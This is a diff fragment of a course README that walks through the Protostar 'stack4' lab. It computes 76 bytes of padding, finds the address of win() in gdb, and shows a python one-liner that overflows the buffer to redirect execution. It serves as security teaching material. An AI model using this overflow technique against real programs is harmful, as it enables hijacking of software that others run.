marianoktm/SECPROG-Unisa/README.md

 Since we can write into the buffer, to reach the return addres we have to provide 64 + 8 + 4 = 76 bytes of padding before writing the address we want to jump to.

-Let's just get the address of `win()` once again:
+Let's just find the address of `win()` once again:

 ```
 (gdb) p win
 $1 = {void (void)} 0x80483f4 <win>
 ```

-Now we can use the same script we used for the past challenges:
+Now we can use the same script as in previous challenges:

 ```
 user@protostar:/opt/protostar/bin$ python -c "print('a'*76 + '\xf4\x83\x04\x08')" | ./stack4